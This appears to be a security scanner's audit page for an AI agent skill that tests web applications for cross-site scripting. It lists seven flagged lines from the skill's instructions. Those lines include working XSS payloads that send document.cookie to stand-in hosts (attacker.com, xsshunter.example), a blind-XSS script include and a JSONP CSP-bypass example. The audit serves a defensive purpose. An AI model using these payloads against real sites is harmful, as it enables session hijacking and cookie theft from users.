testing-for-xss-vulnerabilities
Tests web applications for XSS vulnerabilities by injecting JavaScript payloads to demonstrate client-side code execution risks.
Install this skill
or
45/100
Security score
The testing-for-xss-vulnerabilities skill was audited on Jun 5, 2026 and we found 7 security issues across 3 threat categories, including 2 critical. Review the findings below before installing.
Categories Tested
Security Issues
critical line 110
Eval function call - arbitrary code execution
SourceSKILL.md
| 110 | - `eval()`, `setTimeout()`, `setInterval()`, `Function()` |
critical line 121
Eval function call - arbitrary code execution
SourceSKILL.md
| 121 | - `unsafe-eval` allows eval() and similar functions |
low line 188
Fetch to external URL
SourceSKILL.md
| 188 | <img src=x onerror="fetch('https://xsshunter.example/callback?c='+document.cookie)"> |
low line 98
External URL reference
SourceSKILL.md
| 98 | - Use XSS Hunter payloads (`"><script src=https://yourxsshunter.xss.ht></script>`) for blind stored XSS where the payload fires in an admin panel or internal tool you cannot directly access |
low line 124
External URL reference
SourceSKILL.md
| 124 | - **JSONP bypass**: If CSP allows a domain with JSONP endpoints, use `<script src="https://allowed-domain.com/jsonp?callback=alert(1)"></script>` |
low line 126
External URL reference
SourceSKILL.md
| 126 | - Session hijacking: `<script>new Image().src="https://attacker.com/steal?c="+document.cookie</script>` |
low line 188
External URL reference
SourceSKILL.md
| 188 | <img src=x onerror="fetch('https://xsshunter.example/callback?c='+document.cookie)"> |
Scanned on Jun 5, 2026
View Security Dashboard